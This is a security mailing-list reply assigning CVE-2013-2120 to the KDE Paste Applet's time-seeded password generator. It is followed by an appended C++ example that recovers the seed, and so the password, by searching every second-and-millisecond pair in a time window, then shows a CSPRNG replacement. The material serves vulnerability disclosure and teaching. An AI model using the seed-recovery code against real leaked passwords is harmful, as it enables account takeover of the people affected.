Message-ID: <51A641D9.2060700@redhat.com>
Date: Wed, 29 May 2013 11:58:49 -0600
From: Kurt Seifried <kseifried@...hat.com>
To: oss-security@...ts.openwall.com
CC: Michael Samuel <mik@...net.net>, bugtraq@...urityfocus.com
Subject: Re: [oss-security] KDE Paste Applet

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 05/28/2013 05:16 AM, Michael Samuel wrote:
> The paste applet included with kdeplasma-addons allows you to define
> macros that will copy some generated data into the clipboard, using
> simple macros to define the source and format of the data.
>
> The available macros include %{password(...)} which generates "random"
> passwords.
>
> Here is the code that generates the passwords (from pastemacroexpander.cpp):
>
>     QDateTime now = QDateTime::currentDateTime();
>     qsrand(now.toTime_t() / now.time().msec());
>     for (int i = 0; i < charCount; ++i) {
>         result += chars[qrand() % chars.count()];
>     }
>
> Breaking passwords generated by this (for example from leaked password
> hashes) can be done extremely quickly, especially if a password expiry
> or other hint is stored with the password.
>
> Workaround: You can change the macro you were using to a %{exec(...)}
> macro which calls a secure password generator. Please select your
> replacement carefully.
>
> I reported this to security@....org and created a launchpad ticket
> against the Ubuntu package on May 13, followed up with a proof of
> concept on the 17th, and have received no response at all from either.
> Apologies if that was the wrong contact method.
>
> Regards,
> Michael

Nice find. Please use CVE-2013-2120 for this issue.

- -- 
Kurt Seifried Red Hat Security Response Team (SRT)
PGP: 0x5E267993 A90B F995 7350 148F 66BF 7554 160D 4553 5E26 7993
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.13 (GNU/Linux)

iQIcBAEBAgAGBQJRpkHZAAoJEBYNRVNeJnmTZtcP+wdyo+6kfdJq47WO5F9csHmI
vDMFNFRNEjEYgNeD+dQBBB1oEHf/hxi67OJ8cDjZY/x1P4nEj11s/mic1mV6yKw9
0BiPLorquKXRv8s/374T3Fjo4BIHEgWeaaAN0SiaqW5Kwba2t9RXt0RBDs4Lc1R2
1b41BgmvhvZQjxQ0jzffNlaTMntoZdg4DqJh8JQqyHcFbNwFdgjJJVkK4yBPhNYA
8KjBnKJrrfj9VqGy/gYw+iMn0l5FGo8IfTwmfkVJEo0V2NyBvmA0X5CFYX7HPGeK
giKkLZuPQKdC00DSLilLgyoPw6sNKdo1aPZNta+g9fVZt45U75y4SqagsgcDn1HC
+A3XHy9YxanXnW82PSqABBoc/VrI5H2hpKU4y60WNGseHetGAqCv6v1ucpv14++B
Cx9PmYstESnmRGCnNDftG/rQeJlJniw59tusDlV6eJSuxZq11NPBDAhqxjTi4naY
L4wrQZa+xjKlRcmUlfvyTf5Cxhy6gOrEcygBw8OdzEZPy7PN9LLhmK3ZlJk9i0Yu
0hFBUWwDSi0fnMdNlKcfjjKKa3Q5yrMz84sQDU+4trbtoJXHQMsQQJoo5CITdTUZ
uk+L54QPZ82E9Z/0f2RbdtAj+wRPIAKE9Os9wFDd7HcY5LlfV+rMstnRCg69WY4R
buQ4sELAjJndAVU2Kotb
=/83d
-----END PGP SIGNATURE-----
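The following is an added worked example, written for this archive page and not code from kdeplasma-addons, Michael Samuel's proof of concept, or Red Hat. It models the seeding formula quoted above, qsrand(now.toTime_t() / now.time().msec()), shows how an attacker who knows only the rough creation time of a leaked password can recover the seed by enumerating every (second, millisecond) pair in that window, and contrasts it with a generator that reads the kernel CSPRNG. Assumptions: qrand() is stood in for by a glibc-style rand_r() LCG (Qt's real qrand() is platform dependent, but any deterministic 32-bit-seeded PRNG is attacked the same way); the character set, the timestamps and the search window are constructed for the demonstration; the names WeakRng, appletSeed, passwordFromSeed, recoverSeed and strongPassword are this example's own.

```cpp
#include <cstdint>
#include <fstream>
#include <iostream>
#include <optional>
#include <stdexcept>
#include <string>
#include <unordered_set>

// Alphabet the generator draws from (assumption: the applet's real `chars`
// string is not shown in the report; any fixed alphabet gives the same result).
static const std::string kChars =
    "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";

// Stand-in for qsrand()/qrand(): a glibc rand_r()-style LCG (assumption).
struct WeakRng {
    unsigned int state;
    explicit WeakRng(unsigned int seed) : state(seed) {}
    int next() {
        unsigned int n = state;
        n = n * 1103515245u + 12345u;
        int result = static_cast<int>((n / 65536u) % 2048u);
        n = n * 1103515245u + 12345u;
        result = (result << 10) ^ static_cast<int>((n / 65536u) % 1024u);
        n = n * 1103515245u + 12345u;
        result = (result << 10) ^ static_cast<int>((n / 65536u) % 1024u);
        state = n;
        return result;
    }
};

// The seed exactly as the quoted applet code derives it:
// toTime_t() (seconds) integer-divided by the millisecond field (0..999).
// The model rejects msec == 0, where the original expression divides by zero.
unsigned int appletSeed(std::uint32_t secs, int msec) {
    if (msec < 1 || msec > 999) throw std::invalid_argument("msec must be 1..999");
    return secs / static_cast<unsigned int>(msec);
}

// The quoted loop: result += chars[qrand() % chars.count()]
std::string passwordFromSeed(unsigned int seed, int charCount) {
    WeakRng rng(seed);
    std::string result;
    for (int i = 0; i < charCount; ++i)
        result += kChars[static_cast<std::size_t>(rng.next()) % kChars.size()];
    return result;
}

// Attacker side: given a leaked password (or a hash to compare against) and a
// window of plausible creation times, try every (second, msec) pair. Because
// secs / msec collides heavily, the distinct seeds in a window are few.
std::optional<unsigned int> recoverSeed(const std::string& target,
                                        std::uint32_t tStart, std::uint32_t tEnd) {
    std::unordered_set<unsigned int> tried;
    const int len = static_cast<int>(target.size());
    for (std::uint32_t t = tStart; t <= tEnd; ++t)
        for (int m = 1; m <= 999; ++m) {
            unsigned int seed = appletSeed(t, m);
            if (!tried.insert(seed).second) continue;   // already tested this seed
            if (passwordFromSeed(seed, len) == target) return seed;
        }
    return std::nullopt;
}

// Replacement generator: bytes from /dev/urandom, with rejection sampling so
// every character is equiprobable (plain `% chars.count()` is also biased).
std::string strongPassword(int charCount) {
    std::ifstream urandom("/dev/urandom", std::ios::binary);
    if (!urandom) throw std::runtime_error("cannot open /dev/urandom");
    const unsigned int limit = 256u - (256u % kChars.size());  // 248 for 62 chars
    std::string result;
    while (static_cast<int>(result.size()) < charCount) {
        unsigned char b = 0;
        urandom.read(reinterpret_cast<char*>(&b), 1);
        if (!urandom) throw std::runtime_error("short read from /dev/urandom");
        if (b >= limit) continue;                          // reject biased tail
        result += kChars[b % kChars.size()];
    }
    return result;
}

int main() {
    // Constructed scenario: a 12-character password generated at Unix time
    // 1369750000 (28 May 2013) with millisecond field 123; the attacker only
    // knows it was made within roughly +/- 1000 s of that time.
    const std::string leaked = passwordFromSeed(appletSeed(1369750000u, 123), 12);
    auto found = recoverSeed(leaked, 1369749000u, 1369751000u);
    if (found)
        std::cout << "seed " << *found << " regenerates " << leaked << "\n";
    std::cout << "strong: " << strongPassword(12) << "\n";
    return found ? 0 : 1;
}
```

The search loops over about two million (second, msec) pairs but only some sixteen thousand distinct seeds, so recovery takes a fraction of a second; widening the window to a month or a year still stays within a laptop's reach, and the date hints Michael mentions (a password-expiry field, a creation timestamp) shrink it further. The fix is not a better seed for qrand() but a CSPRNG source, as strongPassword() shows.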